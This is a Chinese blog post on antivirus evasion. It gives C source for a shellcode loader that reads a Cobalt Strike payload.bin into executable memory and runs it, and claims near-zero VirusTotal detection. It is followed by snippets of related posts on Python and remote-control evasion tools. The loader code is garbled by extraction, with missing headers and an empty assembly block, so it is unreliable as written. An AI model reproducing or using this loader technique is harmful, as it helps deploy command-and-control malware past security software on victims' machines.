C實現分離免殺

2021-10-20 15:21:03 字數 1121 閱讀 1222

本文章僅用於交流學習,由於傳播、利用此文所提供的資訊而造成的任何直接或者間接的後果及損失,均由使用者本人負責,文章作者不為此承擔任何責任

1.編譯好mian.exe,原始碼如下

#include

#include

intmain

(int argc,

char

* ar**)

dword dwsize =0;

//獲取shellcode的總大小

dwsize =

getfilesize

(hfile,

null);

//申請一塊可讀可寫可執行的記憶體

lpvoid lpaddress =

virtualalloc

(null

, dwsize, mem_commit, page_execute_readwrite);if

(lpaddress ==

null

)//將檔案讀取到申請的記憶體中

dword dwread =0;

readfile

(hfile, lpaddress, dwsize,

&dwread,0)

;//執行shellcode

__asm

return0;

}

2.cs生成payload.bin,此bin檔案多數殺軟不查殺的,思路就是利用mian.exe來執行payload.bin上線cs。

注:payload.bin和mian.exe要處於同一目錄下

火絨

vt查殺70/1

cs免殺 使用python進行免殺

使用python版本為python3.6 32位版本,64位版本測試會報錯。安裝pyinstaller,pywin32 pip3 install pyinstaller pip3 install pywin32 使用cobalsstrike生成c語言shellcode。shellcode 放這個位置...

遠控免殺專題 13 zirikatu免殺

0x01 免殺能力一覽表 幾點說明 1 上表中標識 說明相應防毒軟體未檢測出病毒,也就是代表了bypass。2 為了更好的對比效果,大部分測試payload均使用msf的windows meterperter reverse tcp模組生成。3 由於本機測試時只是安裝了360全家桶和火絨,所以預設情...

遠控免殺專題 18 ASWCrypter免殺

免殺能力一覽表 幾點說明 1 上表中標識 說明相應防毒軟體未檢測出病毒,也就是代表了bypass。2 為了更好的對比效果,大部分測試payload均使用msf的windows meterperter reverse tcp模組生成。3 由於本機測試時只是安裝了360全家桶和火絨,所以預設情況下360...